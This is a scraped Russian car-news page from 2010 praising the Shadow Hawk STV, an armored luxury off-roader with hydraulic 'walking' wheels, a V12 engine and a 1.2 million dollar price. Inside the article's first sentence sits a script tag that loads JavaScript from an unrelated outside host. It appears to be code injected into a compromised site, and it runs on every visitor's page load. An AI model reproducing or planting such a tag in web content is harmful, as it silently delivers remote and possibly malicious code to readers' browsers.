Запрашиваемая страница не найдена USD     CNY     EUR     JPY
Москва C
Последние новости
24 июн 2018, 17:33
По итогам мая российские автолюбители купили 149 машин премиальной марки...
Поиск

Какую марку автомобиля вы предпочитаете?

» » «Шагающий» супер внедорожник для «крутых парней»

«Шагающий» супер внедорожник для «крутых парней»

26 июн 2010, 19:42    ismirnov
0 комментариев    11 452 просмотра

«Шагающий» супер внедорожник <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для «крутых парней» Фирма Shadow, находящаяся в США, создала экстраординарный бронированный вездеход класса люкс – Hawk STV(«Ястреб»). Это настоящий суперкар бездорожья! Что там «Хаммер» - он и рядом не стоял с подобным супер-внедорожником. «Круче» этой машины ещё не было в природе! К этому авто в среде экспертов уже негласно прилепилось название – «мечта всех крутых парней». Да и стоимость у него «не слабая» - 1,2 млн. долларов!

 
В восторг приводит необыкновенная гидравлика этого автомонстра. Каждое из четырёх гигантских колёс этого бронированного внедорожника может независимо от других колёс подниматься на метровую высоту. Это позволяет бронеавтомобилю преодолевать преграды и небольшие ямы, не замечая их. Причём нестись по бездорожью можно не сбавляя скорости. В этом ему поможет активная подвеска и мотор в 1100 «лошадей». Ещё с помощью своей уникальной гидравлической системы броневик может буквально красться, прижавшись к земле, а также делать «шагающие движения».
 
«Начинка» автомобиля вполне может подойти любому спортивному суперкару. Пятитонную «громадину» V12 двигатель неплохо разгоняет: максимальная скорость у бронемобиля 335 км/час, а до 100 км/час он способен разогнаться за 3,5 секунды. Про расход топлива можно только догадываться.
 
Производители элитного броневика оборудовали салон по последнему слову автомобильной роскоши, заключив всё это – богатство и мощь – в панцирь высокотехнологичной брони класса В-7.
 
Этот суперавто будет производиться строго по заказу – не более 12 штук в год. На каком именно заводе будут собирать новый суперброневик не известно. Продажа его ориентирована на рынок США.
 
Вопрос об экспорте автомобиля Shadow Hawk пока остаётся открытым. Но достоверно известно, что покупкой «Ястреба» интересовались «деловые» покупатели из Старого Света: Китая и России.
 
Вывод напрашивается сам собой: настоящие «крутые» парни живут не только в Америке.
Читайте также
13 сен 2015, 12:17    0 комментариев
На своей страничке в Instagram’е Аврил написала, что ей и Чаду тяжело было расставаться, не легче ей было сообщать о разрыве....
Комментарии
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent